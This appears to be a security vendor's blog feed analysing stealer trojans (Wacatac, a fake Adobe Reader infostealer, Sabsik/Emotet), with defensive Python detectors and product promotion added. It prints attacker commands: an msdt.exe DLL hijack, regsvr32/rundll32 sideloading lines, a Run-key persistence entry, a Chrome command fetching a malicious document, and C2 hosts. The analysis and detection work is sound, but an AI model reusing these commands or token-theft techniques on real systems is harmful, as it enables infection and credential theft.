To get Discord tokens from web browsers, Wacatac looks for LevelDB files (.ldb). This is a database format used by Chromium-based browsers to store auth tokens, keys, and the like. As quite a few popular browsers derive from the Chromium core, the malware tries to target them all.

LevelDB files, stored in the Chrome folder

For the sake of clarity, it is worth noting that non-Chromium browsers are not immune to such manipulations. By querying the browser’s database, malware can easily extract the info it needs, or even everything at once. The fact that a browser stores the data differently merely means a couple more lines of malware code.

Aside from crawling through the browser files, the malware also tries to grab the same Discord session tokens from the app’s own directory. As there are a few different clients out there, the malware tries to target them all by scanning for the corresponding folders in the AppData\Roaming directory.

Stealing Data of Crypto Wallets & Gaming Apps

Another typical area of interest for Trojan:Script/Wacatac.B!ml is crypto wallets, both as browser extensions and as desktop apps, as well as gaming applications. It particularly aims for the Metamask, Atomic, Exodus, and NationsGlory crypto wallets. However, stealing from other wallets is just a question of proper configuration, so they may appear in the future. All the collected data is compressed into a .zip archive and sent to the C2.

For gaming apps, the malware particularly aims at Steam and the Riot Client. It looks for their folders in AppData\Local and then creates a zipped copy of their directories.

Exfiltration and C&C Connections

Once Trojan:Script/Wacatac.B!ml finishes the extraction, it keeps idling, waiting for new data to steal. Upon every startup, it goes through all the scans mentioned above, trying to find new data. However, the malware operator can order it to self-destruct when it finishes the data collection, or even force a system crash at that moment. All this is done to hide the traces of malware activity.

Data that has been sent to the Discord webhook by the Trojan:Script/Wacatac.B!ml
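As an added example (not code from the article or from the malware), here is a small Python check over constructed proxy log lines that flags webhook POSTs to Discord coming from an unexpected process or carrying a large multipart upload, which is how the exfiltration shown above would appear in egress telemetry. The log format, the webhook host list and the process allowlist are assumptions for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample proxy log (not real traffic): one request per line.
SAMPLE_PROXY_LOG = """\
2024-03-01T10:00:01Z POST https://discord.com/api/webhooks/1234567890/abcDEF proc=python.exe bytes=184320 ctype=multipart/form-data
2024-03-01T10:00:05Z GET https://discord.com/api/v9/users/@me proc=Discord.exe bytes=0 ctype=-
2024-03-01T10:00:09Z POST https://discord.com/api/webhooks/555/xyz proc=chrome.exe bytes=412 ctype=application/json
2024-03-01T10:00:12Z POST https://example.com/upload proc=wscript.exe bytes=2048 ctype=application/json
2024-03-01T10:00:20Z POST https://discordapp.com/api/webhooks/777/qwe proc=wscript.exe bytes=900 ctype=application/json
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<url>\S+) proc=(?P<proc>\S+) "
    r"bytes=(?P<bytes>\d+) ctype=(?P<ctype>\S+)$"
)
WEBHOOK_PATH_RE = re.compile(r"^/api/webhooks/\d+/[A-Za-z0-9_-]+")
WEBHOOK_HOSTS = {"discord.com", "discordapp.com", "ptb.discord.com", "canary.discord.com"}
# Processes expected to talk to Discord; a webhook POST from anything else deserves a look (assumed allowlist).
EXPECTED_SENDERS = {"discord.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
LARGE_UPLOAD = 64 * 1024  # a zipped wallet or game directory is far bigger than a chat message

def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["bytes"] = int(ev["bytes"])
    return ev

def is_webhook_post(ev):
    u = urlparse(ev["url"])
    return ev["method"] == "POST" and u.hostname in WEBHOOK_HOSTS and bool(WEBHOOK_PATH_RE.match(u.path))

def find_webhook_exfil(log_text):
    """Return alerts for webhook POSTs that look like stealer exfiltration."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or not is_webhook_post(ev):
            continue
        reasons = []
        if ev["proc"].lower() not in EXPECTED_SENDERS:
            reasons.append("webhook POST from an unexpected process")
        if ev["ctype"].startswith("multipart/form-data") and ev["bytes"] >= LARGE_UPLOAD:
            reasons.append("large multipart upload (file attachment)")
        if reasons:
            alerts.append({"ts": ev["ts"], "proc": ev["proc"], "url": ev["url"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in find_webhook_exfil(SAMPLE_PROXY_LOG):
        print(a["ts"], a["proc"], "->", a["url"], ";", "; ".join(a["reasons"]))
```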

Protecting Against Trojan:Script/Wacatac.B!ml

Stealer malware, such as Trojan:Script/Wacatac.B!ml, is often easily detectable by well-designed antivirus programs. An antivirus program equipped with heuristic detection systems and AI assistance can readily identify and remove this threat. GridinSoft Anti-Malware, in particular, is a reliable choice for this task. It can remove the malware and ensure your PC remains safeguarded for an extended period.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Adobe Reader Infostealer Plagues Email Messages in Brazil
https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/
Tue, 12 Mar 2024 19:26:13 +0000
A recent email spam campaign reportedly spreads infostealer malware under the guise of an Adobe Reader installer. Within a forged PDF document, there is a request to install the Adobe Reader app, which triggers the malware download and installation. Considering the language of the said documents, this malicious activity mainly targets Portugal and Brazil.

Infostealer Spreads in Fake Adobe Reader Installers

The recent attack campaign, detected by the ASEC Intelligence Center, starts with email spam. The messages have a PDF file attached, with its contents in Portuguese. This seriously narrows down the list of countries the campaign targets: Brazil and Portugal. Inside the file, there is a pop-up prompt to install Adobe Reader, which is allegedly required to open the document. A short side note: modern web browsers can handle PDFs of any complexity with ease, so such a prompt is a red flag in itself.

Following the document’s instruction triggers the download of a file named Reader_Install_Setup.exe, which obviously mimics a legitimate installation file for the program. It even copies the icon, which makes the fraud even harder to spot at this stage. Running the file, which is in fact a loader, initiates the malware execution.

Fake Adobe Reader installer

However, it does not happen instantly: the malware performs a series of actions to pull off a DLL hijack and run the final payload with the highest privileges possible. First, it spawns an executable file, drops a DLL that contains the actual payload, and runs the msdt.exe process. The latter is a genuine Windows diagnostics tool that the malware uses to call a subordinate service.

"C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes – the command used to call MSDT, specifically its Bluetooth Diagnostic tool

This service subsequently loads the malicious DLL mentioned above. The library, in turn, runs the said executable file, legitimizing the infostealer and providing it with the highest privileges.

Stealer Malware Analysis

Even though the malware used in the campaign appears to be unique and does not belong to any known malware family, its functionality can barely be called unusual. This infostealer gathers basic info about the system, sends it to the command server, and then creates a directory to store the collected data. The malware adds this directory to the list of Microsoft Defender exclusions, so the antivirus will not disrupt its operations. It also mimics a legitimate Chrome folder by adding a fake executable and some of the files typical of a genuine browser folder.

A fake browser folder created by the infostealer to keep the collected data

The C2 servers used by some of the samples confirm the targeting hypothesis mentioned above. hxxps://thinkforce.com[.]br/ and hxxps://blamefade.com[.]br/ receive the AutoFill data from all the browsers. While this is less than what modern infostealers typically gather, it still makes sense: browsers keep almost all of our passwords.

How to protect against infostealer malware?

Information stealers were never an underdog of the malware world, and they remain a potent threat regardless of the circumstances. However, even though their samples may feature outstanding anti-detection tricks, they still need to get in. And this is the point where you can stop them most efficiently.

Be careful with emails. Email spam is probably going to be the most widespread malware delivery method of this decade. Users tend to believe its content or simply ignore the related risks, which inevitably leads to malware infection. A sketchy offer to install a long-forgotten app, or to perform an action that is not normally needed with this type of document, should raise suspicion. At the same time, the texts of such messages may be ridiculous enough to make the fraud apparent.

Use official software sources. It happens that certain files require specific software, but try to use only official distributions of it. Going to the developer’s site and downloading it takes hardly any longer than clicking a link.

Have decent anti-malware software on hand. Malware finds new ways of spreading pretty much every day. To avoid falling victim to the trickiest sample, software that will not allow it to get in is essential. GridinSoft Anti-Malware is a program that provides real-time protection and network filters with hourly updates. This security tool will make sure that malware will not even launch in the first place.

Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/trojanscript-sabsik-fl-aml-analysis-removal/
Thu, 07 Mar 2024 09:15:25 +0000
Trojan:Script/Sabsik.fl.A!ml is a generic detection name used by Microsoft Defender. This name is particularly used to denote stealer malware that also possesses dropper capabilities. It can perform various activities of the attacker’s choice on the victim’s computer, such as spying, data theft, remote control, and installation of other viruses. In this article, we will explain how to analyze, detect, and remove this trojan from your computer.

What is Trojan:Script/Sabsik.fl.A!ml?

Trojan:Script/Sabsik.fl.A!ml is a trojan detected by Windows Defender. This detection particularly refers to stealer malware that is also capable of other activities, for instance deploying other malware.

Request to move a lure file to the MS Office root directory

Typically, Sabsik Trojans are distributed through email spam. The email attachments contain a hidden script that triggers the malware download and execution when macros are enabled. As a result, users who carelessly open these files download and run the virus without realizing it. Some Sabsik samples can self-distribute through vulnerabilities in Windows networking, such as EternalBlue.

Trojan Sabsik Threat Analysis

Probably the best-known malware sample detected as Trojan:Script/Sabsik.fl.A!ml is the Emotet Trojan. Even though it is now close to extinction, the relation of this signature to that malware gives us an excellent clue as to what you can expect when Sabsik is running in the system.

Launch and Detection Evasion

Emotet, a.k.a. Sabsik, uses a variety of techniques to avoid detection by antivirus software and ensure it runs successfully on target systems. The malware typically employs deep packing, obfuscation, and other detection evasion techniques, making it difficult for traditional antivirus solutions to detect its presence. When arranging its launch, this malware typically performs a trick known as DLL sideloading. In practice, this comes down to two commands:

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll – to register the malware DLL.

C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServer – to launch the latter.
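Both this sideloading chain and the msdt.exe DLL hijack from the Adobe Reader campaign described earlier on this page leave the same kind of trace in process-creation telemetry: a Windows utility started by, or loading a module from, a user-writable location. The Python triage below over constructed Sysmon-like events is an added example, not the malware's or the article's code; the event shape, the user-writable path markers and the set of "normal" module extensions are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in a Sysmon-like shape (not captured from a real host).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\msdt.exe",
     "parent": r"C:\Users\Admin\Downloads\Reader_Install_Setup.exe",
     "cmdline": r'"C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes'},
    {"image": r"C:\Windows\System32\msdt.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" -id NetworkDiagnosticsWeb'},  # user-run troubleshooter: benign
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll"},
    {"image": r"C:\Windows\SysWOW64\rundll32.exe", "parent": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServer'},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\component.dll"'},  # installer registering a COM DLL: benign
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj"'},
]

USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")  # assumed markers of user-writable locations
HOST_BINARIES = {"regsvr32.exe", "rundll32.exe"}
NORMAL_MODULE_EXT = {".dll", ".ocx", ".ax", ".cpl"}
WIN_PATH_RE = re.compile(r'"([a-z]:\\[^"]+)"|([a-z]:\\[^\s,"]+)', re.I)

def windows_paths(cmdline):
    """Windows paths on a command line, quoted (may contain spaces) or bare."""
    return [quoted or bare for quoted, bare in WIN_PATH_RE.findall(cmdline)]

def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)

def triage(ev):
    """Return the reasons this event looks like loader or sideloading activity (empty if none)."""
    image = PureWindowsPath(ev["image"]).name.lower()
    reasons = []
    if image == "msdt.exe" and in_user_writable(ev["parent"]):
        reasons.append(f"msdt.exe started by a program in a user-writable directory: {ev['parent']}")
    if image in HOST_BINARIES:
        for module in windows_paths(ev["cmdline"]):
            p = PureWindowsPath(module)
            if p.name.lower() == image:
                continue  # the host binary's own path, not a module it loads
            if in_user_writable(module):
                reasons.append(f"{image} loading a module from a user-writable path: {module}")
            if p.suffix.lower() not in NORMAL_MODULE_EXT:
                reasons.append(f"{image} loading a module with an unusual extension: {module}")
    return reasons

def find_suspicious(events):
    scored = [(i, triage(ev)) for i, ev in enumerate(events)]
    return [(i, reasons) for i, reasons in scored if reasons]

if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {i}:", "; ".join(reasons))
```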

Modules

Emotet is modular malware, meaning it can extend its functionality by loading additional modules. Not all Sabsik samples are modular, but modularity has become an increasingly widespread feature of modern malware. Some of the common modules associated with this threat include:

  • Stealer Module – used for stealing banking credentials and other sensitive information.
  • Hardware Module – collects detailed information about the infected system.
  • XMRig Module – utilized for cryptocurrency mining purposes.
  • Advanced Email Stealer Module – steals email credentials and contact lists.
  • SMB Lateral Movement Module – enables lateral movement within a network by exploiting SMB vulnerabilities.
  • Traffic Proxying (UPnP) Module – facilitates the redirection of traffic to C2 servers through compromised servers.

Establishing Persistence & Data Stealing

After infecting the system, Sabsik creates a registry entry that ensures it is launched every time the system boots. This persistence mechanism allows Sabsik to maintain a foothold on the infected system even after reboots. The malware creates a DWORD value with the following contents under the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key:

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj"
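As an added example (not the article's or the malware's code), the Python audit below reads the current user's Run key and Startup folder on Windows and scores entries the way both persistence mechanisms on this page would show up: a random-looking file or directory name (the Sabsik regsvr32 entry above, Wacatac's random-named copy under AppData) and a target in a user-writable location. The scoring thresholds, the vowel-based name heuristic and the sample entries are constructed assumptions.

```python
import re
import sys
from pathlib import Path, PureWindowsPath

# Constructed sample Run entries (value name, command); not read from a real system.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Tzusqvzhnftw", r'C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj"'),
    ("Updater", r'"C:\Users\Admin\AppData\Roaming\Xqzvbtrkmw\plvxqzr.exe"'),
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
]
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")  # assumed markers
HOST_BINARIES = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
WIN_PATH_RE = re.compile(r'"([a-z]:\\[^"]+)"|([a-z]:\\[^\s,"]+)', re.I)
VOWELS = set("aeiouy")

def looks_random(name):
    """Heuristic for generated names such as Tzusqvzhnftw: long, almost vowel-free, or with long consonant runs."""
    letters = "".join(c for c in name.lower() if c.isalpha())
    if len(letters) < 8:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    longest_run = max(len(run) for run in re.split(r"[aeiouy]", letters))
    return vowel_ratio < 0.2 or longest_run >= 6

def score_run_entry(value_name, command):
    """Score 0 = nothing notable, 2 or more = worth a look. Returns (score, reasons)."""
    score, reasons = 0, []
    for quoted, bare in WIN_PATH_RE.findall(command):
        target = quoted or bare
        p = PureWindowsPath(target)
        if p.name.lower() in HOST_BINARIES:
            continue  # skip the LOLBin itself; the file it loads is what matters
        if any(marker in target.lower() for marker in USER_WRITABLE):
            score += 1; reasons.append(f"target in a user-writable location: {target}")
        if looks_random(p.stem) or looks_random(p.parent.name):
            score += 2; reasons.append(f"random-looking file or directory name: {target}")
    if looks_random(value_name):
        score += 1; reasons.append(f"random-looking value name: {value_name}")
    return score, reasons

def audit(entries):
    """(name, command, reasons) for entries scoring 2 or more."""
    scored = ((name, cmd, score_run_entry(name, cmd)) for name, cmd in entries)
    return [(name, cmd, reasons) for name, cmd, (score, reasons) in scored if score >= 2]

def collect_run_entries():
    # Current user's Run key plus Startup folder; Windows only, empty list elsewhere.
    if sys.platform != "win32":
        return []
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        values = [winreg.EnumValue(key, i) for i in range(winreg.QueryInfoKey(key)[1])]
    entries = [(name, str(data)) for name, data, _ in values]
    startup = Path.home() / "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
    entries += [(f.name, str(f)) for f in startup.iterdir() if f.is_file()] if startup.is_dir() else []
    return entries

if __name__ == "__main__":
    for name, cmd, reasons in audit(collect_run_entries() or SAMPLE_ENTRIES):
        print(name, "=>", cmd, "\n    ", "; ".join(reasons))
```

Run without arguments it audits the live system on Windows and falls back to the constructed sample entries elsewhere; expect false positives on legitimately odd vendor names, so treat hits as leads rather than verdicts.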

Data Collection & Other Functionality

Despite focusing on banking info, Emotet/Sabsik is capable of collecting various types of sensitive information from infected systems. This may include usernames, passwords, system information, and email credentials. Sabsik also possesses functionality for self-propagation through email spamming and lateral movement within networks, allowing it to rapidly spread and infect multiple systems.

Malware Delivery by Emotet

Despite originally being a banking stealer, Emotet is mostly known as dropper malware. In its prime, the vast networks controlled by Emotet were used to deploy various payloads to infected systems, among them ransomware, spyware, coin miners, and other types of malware. Emotet indiscriminately targets both individual users and organizations, spreading its payloads according to the directives of its operators. The following command line, for instance, opens a malicious document through Chrome:

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disk-cache-dir=null --disk-cache-size=1 --media-cache-size=1 --disable-gpu-shader-disk-cache --disable-background-networking --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints "https://brooklyn.blob.core.windows.net/pen-test/MaliciousDOC.doc"

Trojan:Script/Sabsik.fl.A!ml – False Positive or Not?

In some cases, Sabsik Trojan may be mistakenly detected by antivirus software if you try to run a legitimate file such as a game, application, or driver. This can happen due to an incorrect signature, incompatibility, corruption, or file change. According to several user reports, popular games downloaded from legitimate sources may sometimes be mistakenly flagged as Trojan:Script/Sabsik.fl.A!ml.

Mistakenly detected by antivirus

One particular example comes from a BattleNET user who purchased Diablo II Resurrected and was warned about the Sabsik Trojan when trying to launch the game. It’s not hard to guess that a game released by a company as big as Blizzard would not contain malware. If you are 100% sure that the source of your download is safe, the Sabsik Trojan notification could easily be a false positive.

It is also important to note the presence of the “!ml” suffix in the detection name. This stands for the use of an AI detection system. While this method is highly effective, it can generate false positive detections when there is no confirmation from other detection systems.

However, it is not always possible to be 100% sure that the source of a download is safe. If, after interacting with a shady file of unknown origin, you see a warning about the Sabsik Trojan, you should quarantine or remove the source of the threat.

How to remove Trojan:Script/Sabsik.fl.A!ml?

If Sabsik Trojan was detected in an untrusted file, you should delete it. However, this is not enough to be sure of your security. We recommend performing a full system scan with a reliable anti-malware tool such as GridinSoft Anti-Malware. Last but not least, you may want to consider changing important passwords in case they are compromised, although this is unlikely to happen.

Download and install GridinSoft Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

GridinSoft Anti-Malware main screen

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click “Advanced mode” and see the options in the drop-down menus. You can also see extended information about each detection – malware type, effects and potential source of infection.

Scan results screen

Click “Clean Now” to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished
